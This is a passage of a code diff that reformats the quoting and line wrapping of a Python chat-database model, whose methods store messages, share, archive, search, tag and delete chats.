chat is None: return None - return chat.chat.get("history", {}).get("messages", {}).get(message_id, {}) + return chat.chat.get('history', {}).get('messages', {}).get(message_id, {}) def upsert_message_to_chat_by_id_and_message_id( self, id: str, message_id: str, message: dict @@ -486,35 +450,35 @@ def upsert_message_to_chat_by_id_and_message_id( return None # Sanitize message content for null characters before upserting - if isinstance(message.get("content"), str): - message["content"] = sanitize_text_for_db(message["content"]) + if isinstance(message.get('content'), str): + message['content'] = sanitize_text_for_db(message['content']) user_id = chat.user_id chat = chat.chat - history = chat.get("history", {}) + history = chat.get('history', {}) - if message_id in history.get("messages", {}): - history["messages"][message_id] = { - **history["messages"][message_id], + if message_id in history.get('messages', {}): + history['messages'][message_id] = { + **history['messages'][message_id], **message, } else: - history["messages"][message_id] = message + history['messages'][message_id] = message - history["currentId"] = message_id + history['currentId'] = message_id - chat["history"] = history + chat['history'] = history # Dual-write to chat_message table try: ChatMessages.upsert_message( message_id=message_id, chat_id=id, user_id=user_id, - data=history["messages"][message_id], + data=history['messages'][message_id], ) except Exception as e: - log.warning(f"Failed to write to chat_message table: {e}") + log.warning(f'Failed to write to chat_message table: {e}') return self.update_chat_by_id(id, chat) @@ -526,41 +490,37 @@ def add_message_status_to_chat_by_id_and_message_id( return None chat = chat.chat - history = chat.get("history", {}) + history = chat.get('history', {}) - if message_id in history.get("messages", {}): - status_history = history["messages"][message_id].get("statusHistory", []) + if message_id in history.get('messages', {}): + status_history = history['messages'][message_id].get('statusHistory', []) status_history.append(status) - history["messages"][message_id]["statusHistory"] = status_history + history['messages'][message_id]['statusHistory'] = status_history - chat["history"] = history + chat['history'] = history return self.update_chat_by_id(id, chat) - def add_message_files_by_id_and_message_id( - self, id: str, message_id: str, files: list[dict] - ) -> list[dict]: + def add_message_files_by_id_and_message_id(self, id: str, message_id: str, files: list[dict]) -> list[dict]: with get_db_context() as db: chat = self.get_chat_by_id(id, db=db) if chat is None: return None chat = chat.chat - history = chat.get("history", {}) + history = chat.get('history', {}) message_files = [] - if message_id in history.get("messages", {}): - message_files = history["messages"][message_id].get("files", []) + if message_id in history.get('messages', {}): + message_files = history['messages'][message_id].get('files', []) message_files = message_files + files - history["messages"][message_id]["files"] = message_files + history['messages'][message_id]['files'] = message_files - chat["history"] = history + chat['history'] = history self.update_chat_by_id(id, chat, db=db) return message_files - def insert_shared_chat_by_chat_id( - self, chat_id: str, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def insert_shared_chat_by_chat_id(self, chat_id: str, db: Optional[Session] = None) -> Optional[ChatModel]: with get_db_context(db) as db: # Get the existing chat to share chat = db.get(Chat, chat_id) @@ -569,19 +529,19 @@ def insert_shared_chat_by_chat_id( return None # Check if the chat is already shared if chat.share_id: - return self.get_chat_by_id_and_user_id(chat.share_id, "shared", db=db) + return self.get_chat_by_id_and_user_id(chat.share_id, 'shared', db=db) # Create a new chat with the same data, but with a new ID shared_chat = ChatModel( **{ - "id": str(uuid.uuid4()), - "user_id": f"shared-{chat_id}", - "title": chat.title, - "chat": chat.chat, - "meta": chat.meta, - "pinned": chat.pinned, - "folder_id": chat.folder_id, - "created_at": chat.created_at, - "updated_at": int(time.time()), + 'id': str(uuid.uuid4()), + 'user_id': f'shared-{chat_id}', + 'title': chat.title, + 'chat': chat.chat, + 'meta': chat.meta, + 'pinned': chat.pinned, + 'folder_id': chat.folder_id, + 'created_at': chat.created_at, + 'updated_at': int(time.time()), } ) shared_result = Chat(**shared_chat.model_dump()) @@ -590,23 +550,15 @@ def insert_shared_chat_by_chat_id( db.refresh(shared_result) # Update the original chat with the share_id - result = ( - db.query(Chat) - .filter_by(id=chat_id) - .update({"share_id": shared_chat.id}) - ) + result = db.query(Chat).filter_by(id=chat_id).update({'share_id': shared_chat.id}) db.commit() return shared_chat if (shared_result and result) else None - def update_shared_chat_by_chat_id( - self, chat_id: str, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def update_shared_chat_by_chat_id(self, chat_id: str, db: Optional[Session] = None) -> Optional[ChatModel]: try: with get_db_context(db) as db: chat = db.get(Chat, chat_id) - shared_chat = ( - db.query(Chat).filter_by(user_id=f"shared-{chat_id}").first() - ) + shared_chat = db.query(Chat).filter_by(user_id=f'shared-{chat_id}').first() if shared_chat is None: return self.insert_shared_chat_by_chat_id(chat_id, db=db) @@ -624,33 +576,25 @@ def update_shared_chat_by_chat_id( except Exception: return None - def delete_shared_chat_by_chat_id( - self, chat_id: str, db: Optional[Session] = None - ) -> bool: + def delete_shared_chat_by_chat_id(self, chat_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: # Use subquery to delete chat_messages for shared chats - shared_chat_id_subquery = ( - db.query(Chat.id) - .filter_by(user_id=f"shared-{chat_id}") - .scalar_subquery() + shared_chat_id_subquery = db.query(Chat.id).filter_by(user_id=f'shared-{chat_id}').scalar_subquery() + db.query(ChatMessage).filter(ChatMessage.chat_id.in_(shared_chat_id_subquery)).delete( + synchronize_session=False ) - db.query(ChatMessage).filter( - ChatMessage.chat_id.in_(shared_chat_id_subquery) - ).delete(synchronize_session=False) - db.query(Chat).filter_by(user_id=f"shared-{chat_id}").delete() + db.query(Chat).filter_by(user_id=f'shared-{chat_id}').delete() db.commit() return True except Exception: return False - def unarchive_all_chats_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> bool: + def unarchive_all_chats_by_user_id(self, user_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - db.query(Chat).filter_by(user_id=user_id).update({"archived": False}) + db.query(Chat).filter_by(user_id=user_id).update({'archived': False}) db.commit() return True except Exception: @@ -669,9 +613,7 @@ def update_chat_share_id_by_id( except Exception: return None - def toggle_chat_pinned_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def toggle_chat_pinned_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ChatModel]: try: with get_db_context(db) as db: chat = db.get(Chat, id) @@ -683,9 +625,7 @@ def toggle_chat_pinned_by_id( except Exception: return None - def toggle_chat_archive_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def toggle_chat_archive_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ChatModel]: try: with get_db_context(db) as db: chat = db.get(Chat, id) @@ -698,12 +638,10 @@ def toggle_chat_archive_by_id( except Exception: return None - def archive_all_chats_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> bool: + def archive_all_chats_by_user_id(self, user_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - db.query(Chat).filter_by(user_id=user_id).update({"archived": True}) + db.query(Chat).filter_by(user_id=user_id).update({'archived': True}) db.commit() return True except Exception: @@ -717,34 +655,31 @@ def get_archived_chat_list_by_user_id( limit: int = 50, db: Optional[Session] = None, ) -> list[ChatTitleIdResponse]: - with get_db_context(db) as db: query = db.query(Chat).filter_by(user_id=user_id, archived=True) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: - query = query.filter(Chat.title.ilike(f"%{query_key}%")) + query = query.filter(Chat.title.ilike(f'%{query_key}%')) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') if order_by and direction: if not getattr(Chat, order_by, None): - raise ValueError("Invalid order_by field") + raise ValueError('Invalid order_by field') - if direction.lower() == "asc": + if direction.lower() == 'asc': query = query.order_by(getattr(Chat, order_by).asc(), Chat.id) - elif direction.lower() == "desc": + elif direction.lower() == 'desc': query = query.order_by(getattr(Chat, order_by).desc(), Chat.id) else: - raise ValueError("Invalid direction for ordering") + raise ValueError('Invalid direction for ordering') else: query = query.order_by(Chat.updated_at.desc(), Chat.id) - query = query.with_entities( - Chat.id, Chat.title, Chat.updated_at, Chat.created_at - ) + query = query.with_entities(Chat.id, Chat.title, Chat.updated_at, Chat.created_at) if skip: query = query.offset(skip) @@ -755,10 +690,10 @@ def get_archived_chat_list_by_user_id( return [ ChatTitleIdResponse.model_validate( { - "id": chat[0], - "title": chat[1], - "updated_at": chat[2], - "created_at": chat[3], + 'id': chat[0], + 'title': chat[1], + 'updated_at': chat[2], + 'created_at': chat[3], } ) for chat in all_chats @@ -772,32 +707,27 @@ def get_shared_chat_list_by_user_id( limit: int = 50, db: Optional[Session] = None, ) -> list[SharedChatResponse]: - with get_db_context(db) as db: - query = ( - db.query(Chat) - .filter_by(user_id=user_id) - .filter(Chat.share_id.isnot(None)) - ) + query = db.query(Chat).filter_by(user_id=user_id).filter(Chat.share_id.isnot(None)) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: - query = query.filter(Chat.title.ilike(f"%{query_key}%")) + query = query.filter(Chat.title.ilike(f'%{query_key}%')) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') if order_by and direction: if not getattr(Chat, order_by, None): - raise ValueError("Invalid order_by field") + raise ValueError('Invalid order_by field') - if direction.lower() == "asc": + if direction.lower() == 'asc': query = query.order_by(getattr(Chat, order_by).asc(), Chat.id) - elif direction.lower() == "desc": + elif direction.lower() == 'desc': query = query.order_by(getattr(Chat, order_by).desc(), Chat.id) else: - raise ValueError("Invalid direction for ordering") + raise ValueError('Invalid direction for ordering') else: query = query.order_by(Chat.updated_at.desc(), Chat.id) @@ -820,11 +750,11 @@ def get_shared_chat_list_by_user_id( return [ SharedChatResponse.model_validate( { - "id": chat[0], - "title": chat[1], - "share_id": chat[2], - "updated_at": chat[3], - "created_at": chat[4], + 'id': chat[0], + 'title': chat[1], + 'share_id': chat[2], + 'updated_at': chat[3], + 'created_at': chat[4], } ) for chat in all_chats @@ -845,20 +775,20 @@ def get_chat_list_by_user_id( query = query.filter_by(archived=False) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: - query = query.filter(Chat.title.ilike(f"%{query_key}%")) + query = query.filter(Chat.title.ilike(f'%{query_key}%')) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') if order_by and direction and getattr(Chat, order_by): - if direction.lower() == "asc": + if direction.lower() == 'asc': query = query.order_by(getattr(Chat, order_by).asc(), Chat.id) - elif direction.lower() == "desc": + elif direction.lower() == 'desc': query = query.order_by(getattr(Chat, order_by).desc(), Chat.id) else: - raise ValueError("Invalid direction for ordering") + raise ValueError('Invalid direction for ordering') else: query = query.order_by(Chat.updated_at.desc(), Chat.id) @@ -907,10 +837,10 @@ def get_chat_title_id_list_by_user_id( return [ ChatTitleIdResponse.model_validate( { - "id": chat[0], - "title": chat[1], - "updated_at": chat[2], - "created_at": chat[3], + 'id': chat[0], + 'title': chat[1], + 'updated_at': chat[2], + 'created_at': chat[3], } ) for chat in all_chats @@ -933,9 +863,7 @@ def get_chat_list_by_chat_ids( ) return [ChatModel.model_validate(chat) for chat in all_chats] - def get_chat_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def get_chat_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ChatModel]: try: with get_db_context(db) as db: chat_item = db.get(Chat, id) @@ -950,9 +878,7 @@ def get_chat_by_id( except Exception: return None - def get_chat_by_share_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def get_chat_by_share_id(self, id: str, db: Optional[Session] = None) -> Optional[ChatModel]: try: with get_db_context(db) as db: # it is possible that the shared link was deleted. hence, @@ -966,50 +892,38 @@ def get_chat_by_share_id( except Exception: return None - def get_chat_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> Optional[ChatModel]: + def get_chat_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> Optional[ChatModel]: try: with get_db_context(db) as db: chat = db.query(Chat).filter_by(id=id, user_id=user_id).first() return ChatModel.model_validate(chat) except Exception: return None - def is_chat_owner( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def is_chat_owner(self, id: str, user_id: str, db: Optional[Session] = None) -> bool: """ Lightweight ownership check — uses EXISTS subquery instead of loading the full Chat row (which includes the potentially large JSON blob). """ try: with get_db_context(db) as db: - return db.query( - exists().where(and_(Chat.id == id, Chat.user_id == user_id)) - ).scalar() + return db.query(exists().where(and_(Chat.id == id, Chat.user_id == user_id))).scalar() except Exception: return False - def get_chat_folder_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> Optional[str]: + def get_chat_folder_id(self, id: str, user_id: str, db: Optional[Session] = None) -> Optional[str]: """ Fetch only the folder_id column for a chat, without loading the full JSON blob. Returns None if chat doesn't exist or doesn't belong to user. """ try: with get_db_context(db) as db: - result = ( - db.query(Chat.folder_id).filter_by(id=id, user_id=user_id).first() - ) + result = db.query(Chat.folder_id).filter_by(id=id, user_id=user_id).first() return result[0] if result else None except Exception: return None - def get_chats( - self, skip: int = 0, limit: int = 50, db: Optional[Session] = None - ) -> list[ChatModel]: + def get_chats(self, skip: int = 0, limit: int = 50, db: Optional[Session] = None) -> list[ChatModel]: with get_db_context(db) as db: all_chats = ( db.query(Chat) @@ -1030,22 +944,18 @@ def get_chats_by_user_id( query = db.query(Chat).filter_by(user_id=user_id) if filter: - if filter.get("updated_at"): - query = query.filter(Chat.updated_at > filter.get("updated_at")) + if filter.get('updated_at'): + query = query.filter(Chat.updated_at > filter.get('updated_at')) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') if order_by and direction: if hasattr(Chat, order_by): - if direction.lower() == "asc": - query = query.order_by( - getattr(Chat, order_by).asc(), Chat.id - ) - elif direction.lower() == "desc": - query = query.order_by( - getattr(Chat, order_by).desc(), Chat.id - ) + if direction.lower() == 'asc': + query = query.order_by(getattr(Chat, order_by).asc(), Chat.id) + elif direction.lower() == 'desc': + query = query.order_by(getattr(Chat, order_by).desc(), Chat.id) else: query = query.order_by(Chat.updated_at.desc(), Chat.id) @@ -1063,14 +973,12 @@ def get_chats_by_user_id( return ChatListResponse( **{ - "items": [ChatModel.model_validate(chat) for chat in all_chats], - "total": total, + 'items': [ChatModel.model_validate(chat) for chat in all_chats], + 'total': total, } ) - def get_pinned_chats_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[ChatTitleIdResponse]: + def get_pinned_chats_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[ChatTitleIdResponse]: with get_db_context(db) as db: all_chats = ( db.query(Chat) @@ -1081,24 +989,18 @@ def get_pinned_chats_by_user_id( return [ ChatTitleIdResponse.model_validate( { - "id": chat[0], - "title": chat[1], - "updated_at": chat[2], - "created_at": chat[3], + 'id': chat[0], + 'title': chat[1], + 'updated_at': chat[2], + 'created_at': chat[3], } ) for chat in all_chats ] - def get_archived_chats_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[ChatModel]: + def get_archived_chats_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[ChatModel]: with get_db_context(db) as db: - all_chats = ( - db.query(Chat) - .filter_by(user_id=user_id, archived=True) - .order_by(Chat.updated_at.desc()) - ) + all_chats = db.query(Chat).filter_by(user_id=user_id, archived=True).order_by(Chat.updated_at.desc()) return [ChatModel.model_validate(chat) for chat in all_chats] def get_chats_by_user_id_and_search_text( @@ -1116,61 +1018,53 @@ def get_chats_by_user_id_and_search_text( search_text = sanitize_text_for_db(search_text).lower().strip() if not search_text: - return self.get_chat_list_by_user_id( - user_id, include_archived, filter={}, skip=skip, limit=limit, db=db - ) + return self.get_chat_list_by_user_id(user_id, include_archived, filter={}, skip=skip, limit=limit, db=db) - search_text_words = search_text.split(" ") + search_text_words = search_text.split(' ') # search_text might contain 'tag:tag_name' format so we need to extract the tag_name, split the search_text and remove the tags tag_ids = [ - word.replace("tag:", "").replace(" ", "_").lower() - for word in search_text_words - if word.startswith("tag:") + word.replace('tag:', '').replace(' ', '_').lower() for word in search_text_words if word.startswith('tag:') ] # Extract folder names - handle spaces and case insensitivity folders = Folders.search_folders_by_names( user_id, - [ - word.replace("folder:", "") - for word in search_text_words - if word.startswith("folder:") - ], + [word.replace('folder:', '') for word in search_text_words if word.startswith('folder:')], ) folder_ids = [folder.id for folder in folders] is_pinned = None - if "pinned:true" in search_text_words: + if 'pinned:true' in search_text_words: is_pinned = True - elif "pinned:false" in search_text_words: + elif 'pinned:false' in search_text_words: is_pinned = False is_archived = None - if "archived:true" in search_text_words: + if 'archived:true' in search_text_words: is_archived = True - elif "archived:false" in search_text_words: + elif 'archived:false' in search_text_words: is_archived = False is_shared = None - if "shared:true" in search_text_words: + if 'shared:true' in search_text_words: is_shared = True - elif "shared:false" in search_text_words: + elif 'shared:false' in search_text_words: is_shared = False search_text_words = [ word for word in search_text_words if ( - not word.startswith("tag:") - and not word.startswith("folder:") - and not word.startswith("pinned:") - and not word.startswith("archived:") - and not word.startswith("shared:") + not word.startswith('tag:') + and not word.startswith('folder:') + and not word.startswith('pinned:') + and not word.startswith('archived:') + and not word.startswith('shared:') ) ] - search_text = " ".join(search_text_words) + search_text = ' '.join(search_text_words) with get_db_context(db) as db: query = db.query(Chat).filter(Chat.user_id == user_id) @@ -1196,30 +1090,32 @@ def get_chats_by_user_id_and_search_text( # Check if the database dialect is either 'sqlite' or 'postgresql' dialect_name = db.bind.dialect.name - if dialect_name == "sqlite": + if dialect_name == 'sqlite': # SQLite case: using JSON1 extension for JSON searching sqlite_content_sql = ( - "EXISTS (" - " SELECT 1 " + 'EXISTS (' + ' SELECT 1 ' " FROM json_each(Chat.chat, '$.messages') AS message " " WHERE LOWER(message.value->>'content') LIKE '%' || :content_key || '%'" - ")" + ')' ) sqlite_content_clause = text(sqlite_content_sql) query = query.filter( - or_( - Chat.title.ilike(bindparam("title_key")), sqlite_content_clause - ).params(title_key=f"%{search_text}%", content_key=search_text) + or_(Chat.title.ilike(bindparam('title_key')), sqlite_content_clause).params( + title_key=f'%{search_text}%', content_key=search_text + ) ) # Check if there are any tags to filter, it should have all the tags - if "none" in tag_ids: - query = query.filter(text(""" + if 'none' in tag_ids: + query = query.filter( + text(""" NOT EXISTS ( SELECT 1 FROM json_each(Chat.meta, '$.tags') AS tag ) - """)) + """) + ) elif tag_ids: query = query.filter( and_( @@ -1230,13 +1126,13 @@ def get_chats_by_user_id_and_search_text( FROM json_each(Chat.meta, '$.tags') AS tag WHERE tag.value = :tag_id_{tag_idx} ) - """).params(**{f"tag_id_{tag_idx}": tag_id}) + """).params(**{f'tag_id_{tag_idx}': tag_id}) for tag_idx, tag_id in enumerate(tag_ids) ] ) ) - elif dialect_name == "postgresql": + elif dialect_name == 'postgresql': # PostgreSQL doesn't allow null bytes in text. We filter those out by checking # the JSON representation for \u0000 before attempting text extraction @@ -1259,19 +1155,21 @@ def get_chats_by_user_id_and_search_text( query = query.filter( or_( - Chat.title.ilike(bindparam("title_key")), + Chat.title.ilike(bindparam('title_key')), postgres_content_clause, ) - ).params(title_key=f"%{search_text}%", content_key=search_text.lower()) + ).params(title_key=f'%{search_text}%', content_key=search_text.lower()) # Check if there are any tags to filter, it should have all the tags - if "none" in tag_ids: - query = query.filter(text(""" + if 'none' in tag_ids: + query = query.filter( + text(""" NOT EXISTS ( SELECT 1 FROM json_array_elements_text(Chat.meta->'tags') AS tag ) - """)) + """) + ) elif tag_ids: query = query.filter( and_( @@ -1282,20 +1180,18 @@ def get_chats_by_user_id_and_search_text( FROM json_array_elements_text(Chat.meta->'tags') AS tag WHERE tag = :tag_id_{tag_idx} ) - """).params(**{f"tag_id_{tag_idx}": tag_id}) + """).params(**{f'tag_id_{tag_idx}': tag_id}) for tag_idx, tag_id in enumerate(tag_ids) ] ) ) else: - raise NotImplementedError( - f"Unsupported dialect: {db.bind.dialect.name}" - ) + raise NotImplementedError(f'Unsupported dialect: {db.bind.dialect.name}') # Perform pagination at the SQL level all_chats = query.offset(skip).limit(limit).all() - log.info(f"The number of chats: {len(all_chats)}") + log.info(f'The number of chats: {len(all_chats)}') # Validate and return chats return [ChatModel.model_validate(chat) for chat in all_chats] @@ -1327,9 +1223,7 @@ def get_chats_by_folder_ids_and_user_id( self, folder_ids: list[str], user_id: str, db: Optional[Session] = None ) -> list[ChatModel]: with get_db_context(db) as db: - query = db.query(Chat).filter( - Chat.folder_id.in_(folder_ids), Chat.user_id == user_id - ) + query = db.query(Chat).filter(Chat.folder_id.in_(folder_ids), Chat.user_id == user_id) query = query.filter(or_(Chat.pinned == False, Chat.pinned == None)) query = query.filter_by(archived=False) @@ -1353,12 +1247,10 @@ def update_chat_folder_id_by_id_and_user_id( except Exception: return None - def get_chat_tags_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> list[TagModel]: + def get_chat_tags_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> list[TagModel]: with get_db_context(db) as db: chat = db.get(Chat, id) - tag_ids = chat.meta.get("tags", []) + tag_ids = chat.meta.get('tags', []) return Tags.get_tags_by_ids_and_user_id(tag_ids, user_id, db=db) def get_chat_list_by_user_id_and_tag_name( @@ -1371,74 +1263,60 @@ def get_chat_list_by_user_id_and_tag_name( ) -> list[ChatModel]: with get_db_context(db) as db: query = db.query(Chat).filter_by(user_id=user_id) - tag_id = tag_name.replace(" ", "_").lower() + tag_id = tag_name.replace(' ', '_').lower() - log.info(f"DB dialect name: {db.bind.dialect.name}") - if db.bind.dialect.name == "sqlite": + log.info(f'DB dialect name: {db.bind.dialect.name}') + if db.bind.dialect.name == 'sqlite': # SQLite JSON1 querying for tags within the meta JSON field query = query.filter( - text( - f"EXISTS (SELECT 1 FROM json_each(Chat.meta, '$.tags') WHERE json_each.value = :tag_id)" - ) + text(f"EXISTS (SELECT 1 FROM json_each(Chat.meta, '$.tags') WHERE json_each.value = :tag_id)") ).params(tag_id=tag_id) - elif db.bind.dialect.name == "postgresql": + elif db.bind.dialect.name == 'postgresql': # PostgreSQL JSON query for tags within the meta JSON field (for `json` type) query = query.filter( - text( - "EXISTS (SELECT 1 FROM json_array_elements_text(Chat.meta->'tags') elem WHERE elem = :tag_id)" - ) + text("EXISTS (SELECT 1 FROM json_array_elements_text(Chat.meta->'tags') elem WHERE elem = :tag_id)") ).params(tag_id=tag_id) else: - raise NotImplementedError( - f"Unsupported dialect: {db.bind.dialect.name}" - ) + raise NotImplementedError(f'Unsupported dialect: {db.bind.dialect.name}') all_chats = query.all() - log.debug(f"all_chats: {all_chats}") + log.debug(f'all_chats: {all_chats}') return [ChatModel.model_validate(chat) for chat in all_chats] def add_chat_tag_by_id_and_user_id_and_tag_name( self, id: str, user_id: str, tag_name: str, db: Optional[Session] = None ) -> Optional[ChatModel]: - tag_id = tag_name.replace(" ", "_").lower() + tag_id = tag_name.replace(' ', '_').lower() Tags.ensure_tags_exist([tag_name], user_id, db=db) try: with get_db_context(db) as db: chat = db.get(Chat, id) - if tag_id not in chat.meta.get("tags", []): + if tag_id not in chat.meta.get('tags', []): chat.meta = { **chat.meta, - "tags": list(set(chat.meta.get("tags", []) + [tag_id])), + 'tags': list(set(chat.meta.get('tags', []) + [tag_id])), } db.commit() db.refresh(chat) return ChatModel.model_validate(chat) except Exception: return None - def count_chats_by_tag_name_and_user_id( - self, tag_name: str, user_id: str, db: Optional[Session] = None - ) -> int: + def count_chats_by_tag_name_and_user_id(self, tag_name: str, user_id: str, db: Optional[Session] = None) -> int: with get_db_context(db) as db: query = db.query(Chat).filter_by(user_id=user_id, archived=False) - tag_id = tag_name.replace(" ", "_").lower() + tag_id = tag_name.replace(' ', '_').lower() - if db.bind.dialect.name == "sqlite": + if db.bind.dialect.name == 'sqlite': query = query.filter( - text( - "EXISTS (SELECT 1 FROM json_each(Chat.meta, '$.tags') WHERE json_each.value = :tag_id)" - ) + text("EXISTS (SELECT 1 FROM json_each(Chat.meta, '$.tags') WHERE json_each.value = :tag_id)") ).params(tag_id=tag_id) - elif db.bind.dialect.name == "postgresql": + elif db.bind.dialect.name == 'postgresql': query = query.filter( - text( - "EXISTS (SELECT 1 FROM json_array_elements_text(Chat.meta->'tags') elem WHERE elem = :tag_id)" - ) + text("EXISTS (SELECT 1 FROM json_array_elements_text(Chat.meta->'tags') elem WHERE elem = :tag_id)") ).params(tag_id=tag_id) else: - raise NotImplementedError( - f"Unsupported dialect: {db.bind.dialect.name}" - ) + raise NotImplementedError(f'Unsupported dialect: {db.bind.dialect.name}') return query.count() @@ -1467,9 +1345,7 @@ def delete_orphan_tags_for_user( orphans.append(tag_id) Tags.delete_tags_by_ids_and_user_id(orphans, user_id, db=db) - def count_chats_by_folder_id_and_user_id( - self, folder_id: str, user_id: str, db: Optional[Session] = None - ) -> int: + def count_chats_by_folder_id_and_user_id(self, folder_id: str, user_id: str, db: Optional[Session] = None) -> int: with get_db_context(db) as db: query = db.query(Chat).filter_by(user_id=user_id) @@ -1485,28 +1361,26 @@ def delete_tag_by_id_and_user_id_and_tag_name( try: with get_db_context(db) as db: chat = db.get(Chat, id) - tags = chat.meta.get("tags", []) - tag_id = tag_name.replace(" ", "_").lower() + tags = chat.meta.get('tags', []) + tag_id = tag_name.replace(' ', '_').lower() tags = [tag for tag in tags if tag != tag_id] chat.meta = { **chat.meta, - "tags": list(set(tags)), + 'tags': list(set(tags)), } db.commit() return True except Exception: return False - def delete_all_tags_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_all_tags_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: chat = db.get(Chat, id) chat.meta = { **chat.meta, - "tags": [], + 'tags': [], } db.commit() @@ -1525,9 +1399,7 @@ def delete_chat_by_id(self, id: str, db: Optional[Session] = None) -> bool: except Exception: return False - def delete_chat_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_chat_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: db.query(ChatMessage).filter_by(chat_id=id).delete() @@ -1538,39 +1410,29 @@ def delete_chat_by_id_and_user_id( except Exception: return False - def delete_chats_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_chats_by_user_id(self, user_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: self.delete_shared_chats_by_user_id(user_id, db=db) - chat_id_subquery = ( - db.query(Chat.id).filter_by(user_id=user_id).subquery() + chat_id_subquery = db.query(Chat.id).filter_by(user_id=user_id).subquery() + db.query(ChatMessage).filter(ChatMessage.chat_id.in_(chat_id_subquery)).delete( + synchronize_session=False ) - db.query(ChatMessage).filter( - ChatMessage.chat_id.in_(chat_id_subquery) - ).delete(synchronize_session=False) db.query(Chat).filter_by(user_id=user_id).delete() db.commit() return True except Exception: return False - def delete_chats_by_user_id_and_folder_id( - self, user_id: str, folder_id: str, db: Optional[Session] = None - ) -> bool: + def delete_chats_by_user_id_and_folder_id(self, user_id: str, folder_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - chat_id_subquery = ( - db.query(Chat.id) - .filter_by(user_id=user_id, folder_id=folder_id) - .subquery() + chat_id_subquery = db.query(Chat.id).filter_by(user_id=user_id, folder_id=folder_id).subquery() + db.query(ChatMessage).filter(ChatMessage.chat_id.in_(chat_id_subquery)).delete( + synchronize_session=False ) - db.query(ChatMessage).filter( - ChatMessage.chat_id.in_(chat_id_subquery) - ).delete(synchronize_session=False) db.query(Chat).filter_by(user_id=user_id, folder_id=folder_id).delete() db.commit() @@ -1587,32 +1449,22 @@ def move_chats_by_user_id_and_folder_id( ) -> bool: try: with get_db_context(db) as db: - db.query(Chat).filter_by(user_id=user_id, folder_id=folder_id).update( - {"folder_id": new_folder_id} - ) + db.query(Chat).filter_by(user_id=user_id, folder_id=folder_id).update({'folder_id': new_folder_id}) db.commit() return True except Exception: return False - def delete_shared_chats_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_shared_chats_by_user_id(self, user_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: chats_by_user = db.query(Chat).filter_by(user_id=user_id).all() - shared_chat_ids = [f"shared-{chat.id}" for chat in chats_by_user] + shared_chat_ids = [f'shared-{chat.id}' for chat in chats_by_user] # Use subquery to delete chat_messages for shared chats - shared_id_subq = ( - db.query(Chat.id) - .filter(Chat.user_id.in_(shared_chat_ids)) - .subquery() - ) - db.query(ChatMessage).filter( - ChatMessage.chat_id.in_(shared_id_subq) - ).delete(synchronize_session=False) + shared_id_subq = db.query(Chat.id).filter(Chat.user_id.in_(shared_chat_ids)).subquery() + db.query(ChatMessage).filter(ChatMessage.chat_id.in_(shared_id_subq)).delete(synchronize_session=False) db.query(Chat).filter(Chat.user_id.in_(shared_chat_ids)).delete() db.commit() @@ -1632,21 +1484,10 @@ def insert_chat_files( return None chat_message_file_ids = [ - item.id - for item in self.get_chat_files_by_chat_id_and_message_id( - chat_id, message_id, db=db - ) + item.id for item in self.get_chat_files_by_chat_id_and_message_id(chat_id, message_id, db=db) ] # Remove duplicates and existing file_ids - file_ids = list( - set( - [ - file_id - for file_id in file_ids - if file_id and file_id not in chat_message_file_ids - ] - ) - ) + file_ids = list(set([file_id for file_id in file_ids if file_id and file_id not in chat_message_file_ids])) if not file_ids: return None @@ -1667,9 +1508,7 @@ def insert_chat_files( for file_id in file_ids ] - results = [ - ChatFile(**chat_file.model_dump()) for chat_file in chat_files - ] + results = [ChatFile(**chat_file.model_dump()) for chat_file in chat_files] db.add_all(results) db.commit() @@ -1688,13 +1527,9 @@ def get_chat_files_by_chat_id_and_message_id( .order_by(ChatFile.created_at.asc()) .all() ) - return [ - ChatFileModel.model_validate(chat_file) for chat_file in all_chat_files - ] + return [ChatFileModel.model_validate(chat_file) for chat_file in all_chat_files] - def delete_chat_file( - self, chat_id: str, file_id: str, db: Optional[Session] = None - ) -> bool: + def delete_chat_file(self, chat_id: str, file_id: str, 